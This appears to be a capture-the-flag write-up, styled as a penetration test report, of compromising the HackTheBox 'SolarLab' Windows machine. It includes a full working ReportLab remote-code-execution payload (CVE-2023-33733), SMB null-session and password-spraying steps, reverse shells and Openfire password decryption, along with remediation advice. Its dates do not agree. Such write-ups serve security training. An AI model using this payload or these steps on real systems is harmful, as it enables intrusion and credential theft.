Prepared for: HackTheBox
Prepared by: Downscope Security Solutions
Date: 27 May 2024
# Executive Summary
#### Overview
Downscope Security Solutions conducted an internal network penetration test for HackTheBox on May 21st, 2024 from 09:00 to 17:00 CST. The test was conducted to evaluate the security posture of HackTheBox's systems within the provided scope.
#### Objectives
1. Identify security vulnerabilities in HackTheBox's systems.
2. Exploit discovered vulnerabilities to assess their potential impact.
3. Provide remediation recommendations to enhance HackTheBox's security posture.
4. Retrieve the following proprietary files from HackTheBox's network:
- `user.txt`
- `root.txt`
#### Key Findings
Downscope Security Solutions identified several critical and high-severity vulnerabilities during the penetration test. The key findings are:
1. **Exposure of sensitive information via SMB share**
- **Description**: An SMB share that required no username or password to access was discovered, exposing personally identifiable information (PII) such as Social Security numbers, account numbers, usernames, emails, passwords, and security questions/answers.
- **Impact**: Unauthorized access to user accounts, identity theft, and financial fraud.
2. **Remote code execution on ReportHub web application**
- **Description**: The "training request" page on the ReportHub web application has a remote code execution vulnerability due to an outdated third-party dependency (ReportLab).
- **Impact**: Potential for complete system compromise and loss in data confidentiality, integrity, and availability.
3. **Password reuse**
- **Description**: Several users were found to reuse passwords across different accounts, leading to multiple instances of privilege escalation and account takeover.
- **Impact**: This could allow an attacker to conduct credential stuffing attacks, potentially resulting in unauthorized access to several accounts and systems.
4. **Plaintext Credentials Stored in ReportHub's Database**
- **Description**: The ReportHub software stored passwords in plaintext, making them trivially accessible upon a compromise of the database.
- **Impact**: Any read access to the database yields working credentials, and because of the password reuse described above those credentials extend to other accounts and systems. Stored passwords have no confidentiality.
The discovered vulnerabilities could result in significant compromises of data confidentiality, integrity, and availability if exploited by a threat actor. A breach in security as a result of these vulnerabilities could result in financial losses, lawsuits, and loss of public trust.
#### Recommendations:
To mitigate the discovered vulnerabilities and enhance the security posture of HackTheBox, Downscope Security Solutions recommends the following course of action:
- **Secure SMB shares**: Implement access control on SMB shares using the principle of least privilege. If PII must be kept on shares, consider storing it in an encrypted manner.
- **Patch vulnerable software**: Update ReportLab to its latest version.
- **Enforce strong password policies**: Require users to have unique passwords for different accounts. Consider requiring the use of a password manager to generate and store strong passwords.
- **Utilize password hashing in ReportHub's database**: Modify the ReportHub application to store passwords in a hashed format.
- **Conduct regular security audits**: Perform regular security audits to ensure new vulnerabilities and misconfigurations are discovered and remediated.
By implementing the recommended security measures, HackTheBox will greatly enhance its security posture and minimize the risk of future cyber attacks.
#### Scope
The assessment was conducted remotely over an OpenVPN connection from a Downscope Security Solutions lab, headquartered in Lee's Summit, Missouri.
Personnel Involved in the Project
| Name | Company | Role | Email | Phone |
| --------------- | ---------------------------- | ----------------------------------------------------- | ----------------- | ------------------ |
| Haris Pylarinos | HackTheBox | CEO, authorized signatory, secondary point of contact | [email protected] | +44 (777) 240-1923 |
| James Hooker | HackTheBox | CTO, project lead, primary point of contact | [email protected] | +44 (777) 240-4200 |
| Jake Saunders | Downscope Security Solutions | Security consultant | [email protected] | +1 (816) 524-1337 |
### Network Scope
The following list of IP address ranges was provided:
* **10.10.11.16/32**
The testing conditions requested by HackTheBox were as follows:
- Testing of systems be conducted during the specified outage window (09:00 CST - 17:00 CST).
- No Distributed Denial of Service (DDoS) or Denial of Service (DoS) attacks are to be executed.
The assessment was conducted from Downscope Security Solutions' computer systems, which were assigned the following IP addresses. All machines ran a virtualized Kali Linux build:
* **10.10.14.10**
* **10.10.14.5**
* **10.10.14.61**
* **10.10.14.11**
---
# Attack Narrative
The assessment began the morning of May 21st, 2024 at 09:00 CST with the tester establishing a connection to HackTheBox's network via OpenVPN. The tester started with an `nmap` scan of all TCP ports to identify open ports and services on the host:
```bash
# -sVC = service/version detection plus default scripts; -p- = all 65535 TCP ports.
# -oA takes a basename and writes .nmap, .gnmap and .xml next to it.
nmap 10.10.11.16 -sVC -p- --min-rate=2000 -oA nmap/all_ports
```
![[images/Pasted image 20240531004705.png]]
Seeing the redirect to a URL with a subdomain, the tester added the `solarlab.htb` and `report.solarlab.htb` virtual hosts to the local hosts file:
```bash
echo '10.10.11.16 solarlab.htb report.solarlab.htb' | sudo tee -a /etc/hosts
```
The tester visited the web server on port 80, which appeared to be a static site. The web server on port 6791 presented a login page for ReportHub. The tester tried several common username and password combinations without success and, with no known credentials, moved on.
![[images/Pasted image 20240519141945.png]]
Enumerating port 445 (SMB) revealed a readable share called `Documents`. The tester connected to the share with `smbclient` using a null session and downloaded all readable files.
```bash
# list shares with a null session (-N = no password)
smbclient -N -L \\\\solarlab.htb\\
# connect to the Documents share
smbclient -N \\\\solarlab.htb\\Documents
# at the smb: \> prompt, download everything recursively without confirmation prompts
recurse ON
prompt OFF
mget *
```
![[images/Pasted image 20240516142315.png]]
After analyzing the documents, the tester found the following for Claudia S, Blake Byte, and Alexander Knight in `details-file.xlsx`: Social Security numbers, account numbers, usernames, emails, passwords, and security questions/answers. *Note: some of these credentials were later used to gain remote code execution on the `solarlab.htb` machine.*
Next, the tester sprayed the newly discovered usernames and passwords against the `solarlab.htb` machine using the `netexec smb` module, but was unable to find any valid credentials.
While reviewing the ReportHub login page on port 6791, the tester ran a Burp Suite Intruder cluster bomb attack to test every combination of the discovered usernames and passwords. The usernames and passwords from `details-file.xlsx` were used to build the following wordlists:
`users`
```
[email protected]
KAlexander
[email protected]
blake.byte
AlexanderK
ClaudiaS
```
`passwords`
```
[REDACTED FOR SECURITY REASONS]
```
![[images/Pasted image 20240519143526.png]]
The attack failed to find any valid credentials. After further analyzing the discovered usernames/passwords, the tester noticed a naming scheme for the usernames, and made some modifications to the `users` file:
`users`
```
Alexander.knight
KAlexander
blake.byte
AlexanderK
SClaudia
ClaudiaS
BlakeB
BBlake
```
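The username permutation step above is easy to automate. The following script is an added example, not part of the original report: it derives candidate usernames from full names using the naming schemes the tester inferred (first.last, FirstL, LFirst, and so on). The scheme list and the case handling are assumptions for the demonstration; the three names are the ones from `details-file.xlsx`.

```python
# Added example, not part of the original report: generate username
# candidates from full names using common corporate naming schemes.
# The scheme list and the case handling are assumptions for the demo.

SCHEMES = (
    lambda f, l: f"{f}.{l}",      # Blake.Byte / blake.byte
    lambda f, l: f"{f}{l[0]}",    # BlakeB
    lambda f, l: f"{l[0]}{f}",    # BBlake
    lambda f, l: f"{l}{f[0]}",    # ByteB
    lambda f, l: f"{f[0]}{l}",    # BByte
    lambda f, l: f"{f}{l}",       # BlakeByte
    lambda f, l: f"{f}_{l}",      # Blake_Byte / blake_byte
)


def username_candidates(first: str, last: str) -> list:
    """Return deduplicated candidates for one person, in both the
    capitalised form the schemes produce and an all-lowercase form."""
    first, last = first.strip().capitalize(), last.strip().capitalize()
    seen, out = set(), []
    for scheme in SCHEMES:
        for name in (scheme(first, last), scheme(first, last).lower()):
            if name not in seen:
                seen.add(name)
                out.append(name)
    return out


def build_wordlist(people) -> list:
    """Candidates for every (first, last) pair, order preserved, no repeats."""
    seen, out = set(), []
    for first, last in people:
        for name in username_candidates(first, last):
            if name not in seen:
                seen.add(name)
                out.append(name)
    return out


if __name__ == "__main__":
    # Names taken from the report; "S" is the surname as given there.
    people = [("Blake", "Byte"), ("Alexander", "Knight"), ("Claudia", "S")]
    for name in build_wordlist(people):
        print(name)
```

Redirect the output to a file and feed it to Intruder or `netexec` as the username list; the spray stays cheap because each person contributes at most 14 candidates.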
The tester ran the attack again and found a valid password for the `BlakeB` user. After logging into the ReportHub website, the following options were presented:
![[images/Pasted image 20240519144559.png]]
A page with PDF generation capabilities was discovered on the "Training Request" endpoint:
![[images/Pasted image 20240519145717.png]]
The tester then generated a sample training request and discovered that the report was produced with ReportLab, a Python PDF library:
![[images/Pasted image 20240520170514.png]]
ReportLab versions before 3.6.13 (up to and including 3.6.12) are [vulnerable to remote code execution](https://github.com/c53elyas/CVE-2023-33733) (CVE-2023-33733): the HTML-like paragraph markup accepts a Python expression in a `<font color>` attribute, which ReportLab evaluates in its `rl_safe_eval` sandbox, and the expression below escapes that sandbox to reach `os.system`. The vulnerability can be exploited with the following markup:
```html
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('whoami') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
```
After confirming code execution, the tester replaced the `whoami` command with a base64 encoded PowerShell reverse shell (the UTF-16LE/base64 form that `powershell -EncodedCommand` expects, which also avoids quote characters inside the markup). A new PDF was then generated with the modified payload in the "training type" field of the "training request" form:
![[images/Pasted image 20240520184954.png]]
The tester set a `netcat` listener on port 1337, submitted the malicious request to the training request endpoint, and subsequently received a callback:
![[images/Pasted image 20240520184829.png]]
This level of access allowed the tester to achieve the first file-retrieval objective, reading `user.txt` from the 10.10.11.16 machine:
![[images/Pasted image 20240526171742.png]]
The tester then enumerated the `blake` account for privilege escalation vectors and discovered the ReportHub user database at `C:\Users\blake\Documents\app\instance\users.db`:
![[images/Pasted image 20240530232322.png]]
The tester used `net user` to list all local accounts, put the passwords recovered from the database into a wordlist, and ran a password spray with `netexec` to check for reuse:
![[images/Pasted image 20240530232447.png]]
The `Administrator` hit in the screenshot above was a false positive, but the `openfire` credentials were valid and allowed lateral movement. A reverse shell was opened as the `openfire` user with `RunasCs`:
![[images/Pasted image 20240530232523.png]]
This new level of access allowed the tester to decrypt the Openfire administrator password using the `passwordKey` property and the encrypted password stored in `C:\Program Files\Openfire\openfire.script`. The tester compiled and ran the decryption tool from [this](https://github.com/c0rdis/openfire_decrypt) GitHub repository, passing the encrypted password first and the key second:
```bash
javac OpenFireDecryptPass.java
# usage: java OpenFireDecryptPass <encryptedPassword> <passwordKey>
java OpenFireDecryptPass becb...[REDACTED] hGX...[REDACTED]
```
Conveniently, the administrator reused the Openfire password with their Windows account, and vertical privilege escalation was achieved by opening a reverse shell as the `Administrator` account using `RunasCs`:
![[images/Pasted image 20240526171112.png]]
This allowed the tester to complete the second objective of the test: *reading the `root.txt` from the 10.10.11.16 machine*:
![[images/Pasted image 20240526171537.png]]
With the final objective successfully achieved, the assessment concluded May 21st at 15:37 CST.
---
# Vulnerabilities
### 1: Exposure of Sensitive information via SMB Share
##### Description:
An SMB share was found to be accessible without authentication (a null session). The share contained a file named `details-file.xlsx` with sensitive PII for several users, including Social Security numbers, account numbers, usernames, emails, passwords, and security questions/answers.
##### Impact: CRITICAL (9.3/10)
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N`
The presence of personal identifiable information (PII) on an SMB share that allows null authentication can have major consequences, including unauthorized access, data exfiltration, identity theft, and financial fraud.
##### Replication Steps:
1. Connect to the SMB share with a tool like `smbclient` and download the file with sensitive information:
```bash
smbclient -N \\\\solarlab.htb\\Documents
get details-file.xlsx
```
2. Open the `details-file.xlsx` file and view the sensitive information.
##### Remediation:
1. **Restrict access to SMB share**: Implement access controls on the SMB shares using the principle of least privilege to ensure only necessary users are able to access the share.
2. **Safely store sensitive information**: Require users to store passwords for their accounts in a password manager. If a user's Social Security number must be stored on their computer, the file should be encrypted.
3. **Conduct regular audits**: Schedule security audits that include reviews of SMB shares to find and remediate any misconfigured permissions or storage of sensitive data.
##### References:
| Name | Description |
| ------------------------------------------------------------------------ | ---------------------------------------------------------- |
| MITRE ATT&CK [T1135](https://attack.mitre.org/techniques/T1135/) | Network Share Discovery |
| MITRE ATT&CK [T1552.001](https://attack.mitre.org/techniques/T1552/001/) | Unsecured Credentials: Credentials In Files |
| [CWE-200](https://cwe.mitre.org/data/definitions/200.html) | Exposure of Sensitive Information to an Unauthorized Actor |
---
### 2: Authenticated Remote Code Execution on ReportHub Web Application
##### Description:
The ReportHub website suffers from a vulnerability in its PDF generation functionality. It utilizes a version of ReportLab that is vulnerable to remote code execution via injecting malicious HTML code into a PDF generation request.
##### Impact: HIGH (8.8/10)
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
Exploiting this vulnerability allows an attacker to run arbitrary code on the `solarlab.htb` machine, leading to potential compromise of confidentiality, integrity, and availability of the system and its data.
##### Replication Steps:
1. Access the ReportHub website and navigate to the "training request" endpoint.
2. Insert the malicious HTML payload into the "training type" field of the training request form:
```html
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('enter powershell/batch payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
```
3. Start a `netcat` listener and submit the malicious request to the training request endpoint.
##### Remediation:
1. **Patch software**: Update ReportLab to its most recent version.
2. **Input validation**: Treat every value that reaches the PDF generator as untrusted; escape or strip markup from user-supplied fields before they are embedded in ReportLab paragraph markup.
3. **Account privilege separation**: Create an account used only for running the ReportHub service to minimize the impact of a potential compromise.
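Two checks that go with the remediation items above, written as an added example rather than taken from the report or from ReportHub: `reportlab_is_vulnerable()` flags any ReportLab release before 3.6.13, the first version that closed CVE-2023-33733, and `escape_for_paragraph()` neutralises user-supplied text before it is placed inside `<para>` markup, so an injected `<font color="...">` attribute is rendered as literal text rather than parsed. The "training type" field name is taken from the report; the surrounding paragraph text is an assumption.

```python
# Added example, not part of the original report or of ReportHub: a version
# check for CVE-2023-33733 and an escaping helper for user-controlled fields.
import re
from importlib import metadata
from xml.sax.saxutils import escape

FIXED_IN = (3, 6, 13)  # ReportLab 3.6.13 hardened rl_safe_eval


def parse_version(version: str) -> tuple:
    """'3.6.12' -> (3, 6, 12); short versions such as '3.6' are zero-padded."""
    nums = re.findall(r"\d+", version.split("+")[0])  # drop local suffixes
    if not nums:
        raise ValueError(f"unparseable version: {version!r}")
    parts = tuple(int(n) for n in nums[:3])
    return parts + (0,) * (3 - len(parts))


def reportlab_is_vulnerable(version: str) -> bool:
    return parse_version(version) < FIXED_IN


def check_installed() -> str:
    """Report on the ReportLab installed in the current interpreter, if any."""
    try:
        version = metadata.version("reportlab")
    except metadata.PackageNotFoundError:
        return "reportlab is not installed"
    state = "VULNERABLE" if reportlab_is_vulnerable(version) else "patched"
    fixed = ".".join(str(n) for n in FIXED_IN)
    return f"reportlab {version}: {state} (fixed in {fixed})"


def escape_for_paragraph(text: str) -> str:
    """Escape <, >, & and both quote characters so user text can neither
    open a tag nor break out of an attribute inside <para> markup."""
    return escape(text, {'"': "&quot;", "'": "&#39;"})


def training_request_paragraph(training_type: str) -> str:
    """Markup the application should hand to ReportLab for the
    user-controlled "training type" field (paragraph text is assumed)."""
    return f"<para>Training type: {escape_for_paragraph(training_type)}</para>"


if __name__ == "__main__":
    print(check_installed())
    hostile = '<font color="[[[1]]] and \'red\'">x</font>'
    print(training_request_paragraph(hostile))
```

Run `check_installed()` on the ReportHub host (or against its virtual environment) after patching to confirm the upgrade actually took effect; the escaping helper is a defence-in-depth measure, not a substitute for the upgrade.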
##### References:
| Name | Description |
| ------------------------------------------------------------------------ | --------------------------------------------------------- |
| [CWE-94](https://cwe.mitre.org/data/definitions/94.html) | Improper Control of Generation of Code ('Code Injection') |
| [CWE-1395](https://cwe.mitre.org/data/definitions/1395.html) | Dependency on Vulnerable Third-Party Component |
| MITRE ATT&CK [T1059.006](https://attack.mitre.org/techniques/T1059/006/) | Command and Scripting Interpreter: Python |
| [CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) | Information on ReportLab RCE |
---
### 3: Weak Credentials (Password Reuse)
##### Description:
During the assessment, the tester discovered several users were reusing credentials across accounts. This allowed for several instances of privilege escalation and account takeover.
##### Impact: HIGH (8.6/10)
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`
Password reuse can lead to the compromise of user accounts if a single password is used across multiple accounts. This practice can result in an attacker gaining unauthorized access to other systems and accounts.
##### Replication Steps:
1. Obtain valid credentials from one system (e.g., through an SMB share or other means).
2. Attempt to use the same credentials to log in to other systems, services, or accounts.
##### Remediation:
1. **Enforce password policies**: Implement password policies that require unique passwords across users' accounts.
2. **Use a password manager**: Require users to store and generate strong passwords in a password manager, making it easier to store and track multiple unique passwords.
3. **MFA**: As a secondary security control, consider utilizing multi-factor authentication. If a weak credential was guessed or stolen, this security measure would prevent unauthorized access.
##### References:
| Name | Description |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------- |
| MITRE ATT&CK [T1078](https://attack.mitre.org/techniques/T1078/) | Valid Accounts |
| [CWE-1391](https://cwe.mitre.org/data/definitions/1391.html) | Use of Weak Credentials |
| [Create and use strong passwords](https://support.microsoft.com/en-us/windows/create-and-use-strong-passwords-c5cebb49-8c53-4f5e-2bc4-fe357ca048eb) | Microsoft article to assist in the development of a password policy |
---
### 4: Plaintext Credentials Stored in ReportHub's Database
##### Description:
The ReportHub application stores its usernames and passwords in plaintext within its database file. During the assessment, these credentials were readily accessible from the compromised machine.
##### Impact: HIGH (7.8/10)
`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
Having plaintext credentials stored in an application's database can result in attackers obtaining unauthorized access to user accounts. This discovery allowed the tester to obtain valid usernames and passwords, which facilitated further access to systems and accounts.
##### Replication Steps:
1. Obtain a shell on the host as the `blake` user (see finding 2).
2. View ReportHub's user database; the credentials are visible even in a raw dump of the file:
```powershell
type C:\Users\blake\Documents\app\instance\users.db
```
##### Remediation:
1. **Hash passwords**: Modify ReportHub to store passwords in a salted, hashed format using a password-hashing algorithm designed for the purpose, such as bcrypt or Argon2.
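The storage pattern this finding describes beside the remediated one, as an added example that is not ReportHub's code: both run against a SQLite users table because the database found on the host was a single file. ReportHub's real schema is unknown, so the tables are constructed here, and scrypt from the Python standard library stands in for bcrypt or Argon2 so the file runs without extra packages.

```python
# Added example, not part of the original report or of ReportHub: plaintext
# password storage (the finding) beside salted password hashing (the fix).
import base64
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

SCRYPT_N, SCRYPT_R, SCRYPT_P = 2**14, 8, 1  # about 16 MiB of memory per hash


def build_db() -> sqlite3.Connection:
    """Constructed schema: one table per storage pattern."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_plain (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    return conn


def insecure_store(conn, username: str, password: str) -> None:
    """Before: what finding 4 describes; `type users.db` reveals the password."""
    conn.execute("INSERT INTO users_plain VALUES (?, ?)", (username, password))


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """After: salted scrypt, stored with its parameters so they can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                        n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    b64 = lambda b: base64.b64encode(b).decode("ascii")
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${b64(salt)}${b64(dk)}"


def verify_password(password: str, stored: str) -> bool:
    algo, n, r, p, salt_b64, dk_b64 = stored.split("$")
    if algo != "scrypt":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    dk = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                        n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(dk, expected)  # constant-time comparison


def secure_store(conn, username: str, password: str) -> None:
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, hash_password(password)))


def login(conn, username: str, password: str) -> bool:
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        hash_password("")  # burn the same work so timing does not reveal valid usernames
        return False
    return verify_password(password, row[0])


if __name__ == "__main__":
    conn = build_db()
    insecure_store(conn, "blake", "example-password")  # constructed, not the real one
    secure_store(conn, "blake", "example-password")
    print(conn.execute("SELECT * FROM users_plain").fetchone())  # password readable
    print(conn.execute("SELECT * FROM users").fetchone())        # only the hash
    print("login ok:", login(conn, "blake", "example-password"))
```

A dump of the remediated table yields only `scrypt$16384$8$1$<salt>$<hash>` strings, so a repeat of the spray in the attack narrative would require cracking each hash individually instead of reading passwords off the disk.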
##### References:
| Name | Description |
| ------------------------------------------------------------------------ | ------------------------------------------- |
| MITRE ATT&CK [T1552.001](https://attack.mitre.org/techniques/T1552/001/) | Unsecured Credentials: Credentials In Files |
| [CWE-313](https://cwe.mitre.org/data/definitions/313.html) | Cleartext Storage in a File or on Disk |